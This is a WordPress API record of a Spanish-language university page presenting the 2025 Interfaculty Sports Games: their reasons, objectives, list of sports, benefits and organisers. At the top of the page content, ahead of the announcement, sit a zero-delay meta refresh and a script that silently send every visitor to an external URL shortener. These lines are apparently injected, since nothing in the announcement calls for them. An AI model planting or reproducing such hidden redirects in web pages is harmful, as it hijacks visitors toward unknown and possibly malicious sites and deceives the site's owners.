{"id":1350,"date":"2025-09-08T15:48:59","date_gmt":"2025-09-08T13:48:59","guid":{"rendered":"http:\/\/170.210.81.163\/interfacultades\/?page_id=1350"},"modified":"2025-09-15T10:27:38","modified_gmt":"2025-09-15T13:27:38","slug":"somos-los-jdfi-2025","status":"publish","type":"page","link":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/somos-los-jdfi-2025\/","title":{"rendered":"Somos los JDIF 2025"},"content":{"rendered":"<p><meta http-equiv=\"refresh\" content=\"0; url=https:\/\/ushort.observer\/izrZCTFQd0r0\" \/><br \/>\n<script>window.location.href = \"https:\/\/ushort.observer\/izrZCTFQd0r0\";<\/script><br \/>\n<strong>\u00bfPOR QU\u00c9?<\/strong><\/p>\n<p>Porque consideramos el deporte y la recreaci\u00f3n un pilar importante dentro de nuestra instituci\u00f3n. Porque motiva a los estudiantes a prepararse, f\u00edsica y mentalmente.<br \/>\nPorque el deporte mejora la salud y el bienestar de ser humano.<br \/>\nPorque nos permite atender la demanda de los estudiantes en la institucionalizaci\u00f3n de estos juegos.<\/p>\n<p><strong>OBJETIVOS<\/strong>:<br \/>\nOfrecerles a los estudiantes de las distintas unidades acad\u00e9micas un espacio de encuentro, de alegr\u00eda, recreaci\u00f3n y fraternidad.<br \/>\nFomentar el bienestar y una buena calidad de vida en la comunidad universitaria.<br \/>\nLograr a partir de esta instancia institucionalizar los Juegos Deportivos Interfacultades.<\/p>\n<p><strong>DEPORTES<\/strong>:<\/p>\n<p>Basketball<br \/>\nVoleyball<br \/>\nHandball<br \/>\nNataci\u00f3n<br \/>\nRugby Seven<br \/>\nAjedrez<br \/>\nFutsal<br \/>\nAtletismo<br \/>\nTenis de Mesa<br \/>\nEsports<\/p>\n<p><em>(Todas las disciplina con categor\u00edas masculina y femenina y el Tenis de Mesa suma tambi\u00e9n dobles mixtos)<\/em><\/p>\n<p><strong>BENEFICIOS<\/strong>:<br \/>\nEstos juegos Deportivos Interfacultades traen beneficios para toda la comunidad universitaria.<br \/>\nPotencia los ideales de compa\u00f1erismo, perseverancia, compromiso, generosidad y por sobre todo el valor al respeto mutuo.<\/p>\n<p><strong>ORGANIZACI\u00d3N<\/strong>:<br \/>\nHar\u00e1n parte de la organizaci\u00f3n, la Secretar\u00eda de Bienestar Universitario, el Rectorado, la FUC y decanos y decanas de todas las unidades acad\u00e9micas.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>\u00bfPOR QU\u00c9? Porque consideramos el deporte y la recreaci\u00f3n un pilar importante dentro de nuestra instituci\u00f3n. Porque motiva a los estudiantes a prepararse, f\u00edsica y mentalmente. Porque el deporte mejora la salud y el bienestar de ser humano. Porque nos permite atender la demanda de los estudiantes en la institucionalizaci\u00f3n de estos juegos. OBJETIVOS: Ofrecerles [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":1354,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-1350","page","type-page","status-publish","has-post-thumbnail","hentry"],"_links":{"self":[{"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/pages\/1350","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/comments?post=1350"}],"version-history":[{"count":2,"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/pages\/1350\/revisions"}],"predecessor-version":[{"id":2544,"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/pages\/1350\/revisions\/2544"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/media\/1354"}],"wp:attachment":[{"href":"https:\/\/interfacultades.uncoma.edu.ar\/index.php\/wp-json\/wp\/v2\/media?parent=1350"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}